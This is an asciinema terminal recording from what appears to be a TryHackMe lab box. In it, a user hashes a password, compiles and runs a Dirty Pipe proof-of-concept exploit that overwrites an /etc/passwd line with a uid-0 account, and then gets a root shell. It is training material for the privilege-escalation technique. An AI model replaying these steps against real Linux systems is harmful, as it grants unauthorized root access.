{"version": 2, "width": 119, "height": 54, "timestamp": 1647229431, "env": {"SHELL": "/bin/bash", "TERM": "xterm-256color"}}
[0.206592, "o", "\u001b]0;tryhackme@dirty-pipe: ~\u0007\u001b[01;32mtryhackme@dirty-pipe\u001b[00m:\u001b[01;34m~\u001b[00m$ "]
[0.634887, "o", "o"]
[0.706372, "o", "p"]
[0.754233, "o", "e"]
[0.81437, "o", "n"]
[0.862234, "o", "s"]
[0.942383, "o", "s"]
[0.998248, "o", "l"]
[1.080518, "o", " "]
[1.166584, "o", "p"]
[1.194146, "o", "a"]
[1.226239, "o", "s"]
[1.312115, "o", "s"]
[1.398486, "o", "w"]
[1.422145, "o", "d"]
[1.498386, "o", " "]
[1.622538, "o", "-"]
[2.030479, "o", "6"]
[2.118557, "o", " "]
[2.27848, "o", "-"]
[2.358513, "o", "-"]
[2.390335, "o", "s"]
[2.478659, "o", "a"]
[2.546247, "o", "l"]
[2.606483, "o", "t"]
[2.686517, "o", " "]
[2.80639, "o", "T"]
[2.89442, "o", "H"]
[3.006426, "o", "M"]
[3.094584, "o", " "]
[3.17449, "o", "\""]
[3.450659, "o", "T"]
[3.622658, "o", "r"]
[3.667382, "o", "y"]
[3.81848, "o", "H"]
[3.895015, "o", "a"]
[3.926264, "o", "c"]
[4.014592, "o", "k"]
[4.190512, "o", "M"]
[4.27447, "o", "e"]
[4.40252, "o", "1"]
[4.446451, "o", "2"]
[4.550599, "o", "3"]
[4.694543, "o", "!"]
[5.130695, "o", "\""]
[5.384943, "o", "\r\n"]
[5.385178, "o", "$6$THM$eRD0Ur0SZuwDLSwf9Lb2vyC2T6/PtQUA/B0Ssm6/jsiBtpSvc6QLjhFF0XNM8odgfkxMnC4oczGuvEomrVRfz0\r\n"]
[5.385487, "o", "\u001b]0;tryhackme@dirty-pipe: ~\u0007\u001b[01;32mtryhackme@dirty-pipe\u001b[00m:\u001b[01;34m~\u001b[00m$ "]
[5.886106, "o", "g"]
[5.981423, "o", "r"]
[6.017749, "o", "e"]
[6.037202, "o", "p"]
[6.136018, "o", " "]
[6.209394, "o", "-"]
[6.249301, "o", "b"]
[6.349233, "o", " "]
[6.433298, "o", "\""]
[6.93371, "o", "g"]
[7.042606, "o", "a"]
[7.077612, "o", "m"]
[7.10933, "o", "e"]
[7.141218, "o", "s"]
[7.274887, "o", "\""]
[7.353532, "o", " "]
[7.493456, "o", "/"]
[7.525306, "o", "e"]
[7.557205, "o", "t"]
[7.657562, "o", "c"]
[7.717422, "o", "/"]
[7.833451, "o", "p"]
[7.857334, "o", "a"]
[7.877079, "o", "s"]
[7.961273, "o", "s"]
[8.057444, "o", "w"]
[8.08117, "o", "d"]
[8.181868, "o", "\r\n\u001b[32m\u001b[K189\u001b[m\u001b[K\u001b[36m\u001b[K:\u001b[m\u001b[K\u001b[01;31m\u001b[Kgames\u001b[m\u001b[K:x:5:60:\u001b[01;31m\u001b[Kgames\u001b[m\u001b[K:/usr/\u001b[01;31m\u001b[Kgames\u001b[m\u001b[K:/usr/sbin/nologin\r\n\u001b]0;tryhackme@dirty-pipe: ~\u0007\u001b[01;32mtryhackme@dirty-pipe\u001b[00m:\u001b[01;34m~\u001b[00m$ "]
[8.525972, "o", "c"]
[8.593303, "o", "p"]
[8.673675, "o", " "]
[8.757287, "o", "/"]
[9.041695, "o", "e"]
[9.077286, "o", "t"]
[9.185505, "o", "c"]
[9.263102, "o", "/"]
[9.377528, "o", "p"]
[9.409348, "o", "a"]
[9.433259, "o", "s"]
[9.513443, "o", "s"]
[9.633354, "o", "w"]
[9.64117, "o", "d"]
[9.725501, "o", " "]
[9.946003, "o", "/"]
[10.001371, "o", "t"]
[10.097556, "o", "m"]
[10.125386, "o", "p"]
[10.253565, "o", "/"]
[10.361541, "o", "p"]
[10.401464, "o", "a"]
[10.417615, "o", "s"]
[10.505288, "o", "s"]
[10.613573, "o", "w"]
[10.637322, "o", "d"]
[10.789933, "o", "\r\n\u001b]0;tryhackme@dirty-pipe: ~\u0007\u001b[01;32mtryhackme@dirty-pipe\u001b[00m:\u001b[01;34m~\u001b[00m$ "]
[11.041615, "o", "c"]
[11.085447, "o", "d"]
[11.185423, "o", " "]
[11.297462, "o", "E"]
[11.413725, "o", "x"]
[11.459018, "o", "ploit/"]
[11.73763, "o", "P"]
[11.881478, "o", "o"]
[11.946811, "o", "C/"]
[12.447268, "o", "\r\n\u001b]0;tryhackme@dirty-pipe: ~/Exploit/PoC\u0007\u001b[01;32mtryhackme@dirty-pipe\u001b[00m:\u001b[01;34m~/Exploit/PoC\u001b[00m$ "]
[12.759592, "o", "g"]
[12.871113, "o", "c"]
[12.939057, "o", "c"]
[12.998945, "o", " "]
[13.231404, "o", "p"]
[13.335127, "o", "o"]
[13.459744, "o", "c.c "]
[13.699284, "o", "-"]
[14.04354, "o", "o"]
[14.127033, "o", " "]
[14.159009, "o", "e"]
[14.255198, "o", "x"]
[14.295119, "o", "p"]
[14.330998, "o", "l"]
[14.42302, "o", "o"]
[14.527207, "o", "i"]
[14.560419, "o", "t"]
[14.651358, "o", "\r\n"]
[14.678665, "o", "\u001b]0;tryhackme@dirty-pipe: ~/Exploit/PoC\u0007\u001b[01;32mtryhackme@dirty-pipe\u001b[00m:\u001b[01;34m~/Exploit/PoC\u001b[00m$ "]
[15.179157, "o", "./exploit /etc/passwd 189  'muiri:$6$THM$eRD0Ur0SZuwDLSwf9Lb2vyC2T6/PtQUA/B0Ssm6/jsiBtpSvc6QLjhFF0XNM8odgfkxMnC4oczGuvEomrVRfz0:0:0::/root:/bin/bash\r\n> '\r\n"]
[15.379599, "o", "It worked!\r\n"]
[15.579892, "o", "\u001b]0;tryhackme@dirty-pipe: ~/Exploit/PoC\u0007\u001b[01;32mtryhackme@dirty-pipe\u001b[00m:\u001b[01;34m~/Exploit/PoC\u001b[00m$ "]
[15.680484, "o", "s"]
[15.792015, "o", "u"]
[15.907839, "o", " "]
[16.408203, "o", "m"]
[16.511646, "o", "u"]
[16.61586, "o", "i"]
[16.659682, "o", "r"]
[16.719647, "o", "i"]
[16.979691, "o", "\r\n"]
[16.981345, "o", "Password: "]
[17.481941, "o", "\r\n"]
[17.490767, "o", "\u001b]0;root@dirty-pipe: /home/tryhackme/Exploit/PoC\u0007root@dirty-pipe:/home/tryhackme/Exploit/PoC# "]
[17.991278, "o", "w"]
[18.091145, "o", "h"]
[18.13499, "o", "o"]
[18.194721, "o", "a"]
[18.234643, "o", "m"]
[18.278666, "o", "i"]
[18.314722, "o", "\r\n"]
[18.316077, "o", "root"]
[18.316274, "o", "\r\n"]
[18.316462, "o", "\u001b]0;root@dirty-pipe: /home/tryhackme/Exploit/PoC\u0007root@dirty-pipe:/home/tryhackme/Exploit/PoC# "]
[18.579264, "o", "i"]
[18.606824, "o", "d"]
[18.698651, "o", "\r\n"]
[18.699402, "o", "uid=0(root) gid=0(root) groups=0(root)"]
[18.699606, "o", "\r\n"]
[18.699779, "o", "\u001b]0;root@dirty-pipe: /home/tryhackme/Exploit/PoC\u0007root@dirty-pipe:/home/tryhackme/Exploit/PoC# "]
[18.871024, "o", "i"]
[18.963125, "o", "p"]
[19.143087, "o", " "]
[19.212632, "o", "a"]
[19.311279, "o", "\r\n"]
[19.311928, "o", "1: lo: <LOOPBACK,UP,LOWER_UP> mtu 65536 qdisc noqueue state UNKNOWN group default qlen 1000"]
[19.31215, "o", "\r\n    link/loopback 00:00:00:00:00:00 brd 00:00:00:00:00:00"]
[19.312343, "o", "\r\n    inet 127.0.0.1/8 scope host lo"]
[19.312504, "o", "\r\n       valid_lft forever preferred_lft forever"]
[19.312706, "o", "\r\n    inet6 ::1/128 scope host "]
[19.312851, "o", "\r\n       valid_lft forever preferred_lft forever\r\n2: eth0: <BROADCAST,MULTICAST,UP,LOWER_UP> mtu 9001 qdisc fq_codel state UP group default qlen 1000\r\n    link/ether 02:18:1d:57:13:9f brd ff:ff:ff:ff:ff:ff"]
[19.313038, "o", "\r\n    inet 10.10.10.10/16 brd 10.10.255.255 scope global dynamic eth0\r\n       valid_lft 2573sec preferred_lft 2573sec\r\n    inet6 fe80::18:1dff:fe57:139f/64 scope link \r\n       valid_lft forever preferred_lft forever\r\n\u001b]0;root@dirty-pipe: /home/tryhackme/Exploit/PoC\u0007root@dirty-pipe:/home/tryhackme/Exploit/PoC# "]
[22.36693, "o", ""]
